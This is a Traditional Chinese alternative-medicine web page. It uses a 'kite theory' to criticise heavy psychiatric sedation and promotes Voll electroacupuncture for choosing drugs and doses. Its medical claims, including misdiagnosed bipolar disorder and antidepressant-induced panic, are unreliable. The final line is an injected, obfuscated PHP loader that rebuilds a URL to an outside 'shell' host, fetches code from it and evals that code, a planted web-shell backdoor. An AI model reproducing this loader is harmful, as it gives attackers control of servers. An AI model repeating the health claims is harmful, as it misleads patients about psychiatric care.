收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 開框說明:風箏理論
開框說明:風箏理論 列印 E-mail
        一般而言,情緒人格障礙患者(或精神障礙患者)大多會造成周圍親友及家屬莫大的困擾與生活照顧的壓力。情緒人格障礙患者(或精神障礙患者)在發作急性疾病時,就好像「斷線的風箏」飛出去而無法控制,因此精神科醫師為了減少大家的困擾,希望儘速控制患者病情,寧願讓患者產生「呆滯」的副作用,也不希望慢慢控制患者病情(就好像為了怕風箏飛走,無法控制,而用力將風箏拉下落在地上)。因為控制患者病情的時間愈長,大家的困擾愈多。

此時,醫師只能靠臨床經驗選取藥物種類並使用較大的劑量,來控制患者當時的狀況,快速的讓患者由混亂中恢復安定,即使讓患者產生「呆滯」的副作用,也在所不惜。當然,這是「不是辦法」中的「辦法」。

如何為患者「選取適當的藥物種類與劑量」,在此時對患者與其家人而言,均具有重大的意義,因為我們希望做到的是:「治療患者」,而不是:「打昏患者」。

        當風箏快要失控飛出去時,我們希望用的是「適當的用力方向與力量」,讓風箏能在適當的控制中,繼續在空中飛翔。而不是在情急之下「用力急拉」,導致風箏落地,無法繼續飛翔。

        此時,「選取適當的藥物種類與劑量」就可以相對的讓患者快速回歸正常生活,而比較不易產生「呆滯」的副作用,所以,運用「傅爾電針」選取藥物種類與劑量的「藥物診斷學」就是一個可以相對正確「選取適當的藥物種類與劑量」的方法,並可同時作為患者疾病診斷的輔助工具。這也是我們一直費盡心思推廣「另類醫學」的原因之一。

        在臨床中,我們經常發現被診斷為「憂鬱症」的患者,其實他們只是:「躁鬱症」的另外一種表現,到底「憂鬱症」與「躁鬱症」患者的臨床症狀有何不同?為何經常被錯誤診斷,根據我多年的臨床經驗與觀察,「憂鬱症」的內在狀況是:「鬱、有想要躲起來的感覺」,而「躁鬱症」引起的「鬱」內在狀況是:「內心仍有攻擊的慾望、只是不敢」。兩種狀況臨床表現極為類似,都是用「鬱」來表現,所以臨床的問診與觀察非常重要。

        許多「躁鬱症」的患者被誤診為「憂鬱症」,服用百憂解….等抗鬱藥物(註)治療後,產生了「恐慌」的副作用。此時往往患者又被多安上了一個診斷:「恐慌症」。到底「恐慌症」是患者原有的疾病呢?還是因為錯誤診斷、治療後的副作用呢?我們在臨床上發現,後者竟然比前者還多,當然也只有被錯誤診斷、治療的患者,才會來找我們治療,所以會有這樣的結果。

        我們永遠不會否定主流醫學中精神科醫師的專業能力與價值,但精神科一再的更新疾病診斷的分類與改變治療的藥物,也是不爭的事實,所以我們深信「主流醫學」與「另類醫學」如果能拋棄門戶之見,真正相輔相成,相信必是患者與醫師共同的福氣!

(註)香港明日報89.05.26報導:「如果沒有『憂鬱症』的人服用百憂解,會導致服用者產生『無助』與『自殺』的念頭」。
法新社97.02.27報導「英國研究,服用抗鬱藥物,效果不大」。
維基百科2007.11.14:「FDA公佈所有抗鬱藥物都會導致自殺傾向,」【劉醫師註記:或許這些副作用是錯誤處方的結果】。
維基百科2007.11.14:「FDA1987-1999臨床報告:百憂解療效只跟安慰劑差兩成
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));